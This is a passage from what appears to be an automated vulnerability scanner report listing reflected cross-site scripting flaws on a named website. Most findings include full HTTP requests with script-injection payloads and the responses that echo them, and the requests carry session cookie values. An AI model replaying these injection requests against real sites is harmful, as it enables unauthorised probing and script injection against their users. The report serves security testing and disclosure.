2.928. http://www.resellerbase.com/detail/11/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 356bc<script>alert(1)</script>6884990c738 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/search.php?356bc<script>alert(1)</script>6884990c738=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/search.php?356bc<script>alert(1)</script>6884990c738=1 was not found on this server.</p>
...[SNIP]...

2.929. http://www.resellerbase.com/detail/11/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/11/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7bcb8<a>78b22f91fc3 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/search.php?keyword=search...&Submit3=Search&opt=27bcb8<a>78b22f91fc3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/search.php?keyword=search...&Submit3=Search&opt=27bcb8<a>78b22f91fc3 was not found on this server.</p>
...[SNIP]...

2.930. http://www.resellerbase.com/detail/11/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 38dda<script>alert(1)</script>87c603092e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail38dda<script>alert(1)</script>87c603092e1/11/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail38dda<script>alert(1)</script>87c603092e1/11/themes/ was not found on this server.</p>
...[SNIP]...

2.931. http://www.resellerbase.com/detail/11/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b5697<script>alert(1)</script>ce2f6e538ad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11b5697<script>alert(1)</script>ce2f6e538ad/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11b5697<script>alert(1)</script>ce2f6e538ad/themes/ was not found on this server.</p>
...[SNIP]...

2.932. http://www.resellerbase.com/detail/11/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 87563<script>alert(1)</script>06940c532c5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes87563<script>alert(1)</script>06940c532c5/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes87563<script>alert(1)</script>06940c532c5/ was not found on this server.</p>
...[SNIP]...

2.933. http://www.resellerbase.com/detail/11/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 10812<script>alert(1)</script>eff8211653f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/?10812<script>alert(1)</script>eff8211653f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/?10812<script>alert(1)</script>eff8211653f=1 was not found on this server.</p>
...[SNIP]...

2.934. http://www.resellerbase.com/detail/11/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a2313<script>alert(1)</script>4a6aa4bacd6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila2313<script>alert(1)</script>4a6aa4bacd6/11/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila2313<script>alert(1)</script>4a6aa4bacd6/11/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.935. http://www.resellerbase.com/detail/11/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c07ff<script>alert(1)</script>25fb198efe8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11c07ff<script>alert(1)</script>25fb198efe8/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11c07ff<script>alert(1)</script>25fb198efe8/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.936. http://www.resellerbase.com/detail/11/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ba484<script>alert(1)</script>c28c064e682 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themesba484<script>alert(1)</script>c28c064e682/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themesba484<script>alert(1)</script>c28c064e682/kosmos/ was not found on this server.</p>
...[SNIP]...

2.937. http://www.resellerbase.com/detail/11/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6479c<script>alert(1)</script>3e196cc94bf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos6479c<script>alert(1)</script>3e196cc94bf/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos6479c<script>alert(1)</script>3e196cc94bf/ was not found on this server.</p>
...[SNIP]...

2.938. http://www.resellerbase.com/detail/11/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7c0b1<script>alert(1)</script>d8adee29210 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/?7c0b1<script>alert(1)</script>d8adee29210=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/?7c0b1<script>alert(1)</script>d8adee29210=1 was not found on this server.</p>
...[SNIP]...

2.939. http://www.resellerbase.com/detail/11/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1753c<script>alert(1)</script>c7cb5d8aa71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail1753c<script>alert(1)</script>c7cb5d8aa71/11/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail1753c<script>alert(1)</script>c7cb5d8aa71/11/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.940. http://www.resellerbase.com/detail/11/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 31bdd<script>alert(1)</script>f495740bcd2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1131bdd<script>alert(1)</script>f495740bcd2/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1131bdd<script>alert(1)</script>f495740bcd2/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.941. http://www.resellerbase.com/detail/11/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4c13c<script>alert(1)</script>72ba3ce6f26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes4c13c<script>alert(1)</script>72ba3ce6f26/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes4c13c<script>alert(1)</script>72ba3ce6f26/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.942. http://www.resellerbase.com/detail/11/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 62d78<script>alert(1)</script>c38f6fc6f82 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos62d78<script>alert(1)</script>c38f6fc6f82/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos62d78<script>alert(1)</script>c38f6fc6f82/images/ was not found on this server.</p>
...[SNIP]...

2.943. http://www.resellerbase.com/detail/11/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b954e<script>alert(1)</script>03813fd1bea was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/imagesb954e<script>alert(1)</script>03813fd1bea/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/imagesb954e<script>alert(1)</script>03813fd1bea/ was not found on this server.</p>
...[SNIP]...

2.944. http://www.resellerbase.com/detail/11/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 20fb4<script>alert(1)</script>5d06c1f5ea2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images/?20fb4<script>alert(1)</script>5d06c1f5ea2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/?20fb4<script>alert(1)</script>5d06c1f5ea2=1 was not found on this server.</p>
...[SNIP]...

2.945. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 54b9b<script>alert(1)</script>dc53ee4938a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail54b9b<script>alert(1)</script>dc53ee4938a/11/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail54b9b<script>alert(1)</script>dc53ee4938a/11/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.946. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 24638<script>alert(1)</script>0357e201aca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1124638<script>alert(1)</script>0357e201aca/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1124638<script>alert(1)</script>0357e201aca/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.947. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6be89<script>alert(1)</script>9b18396e01 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes6be89<script>alert(1)</script>9b18396e01/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes6be89<script>alert(1)</script>9b18396e01/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.948. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
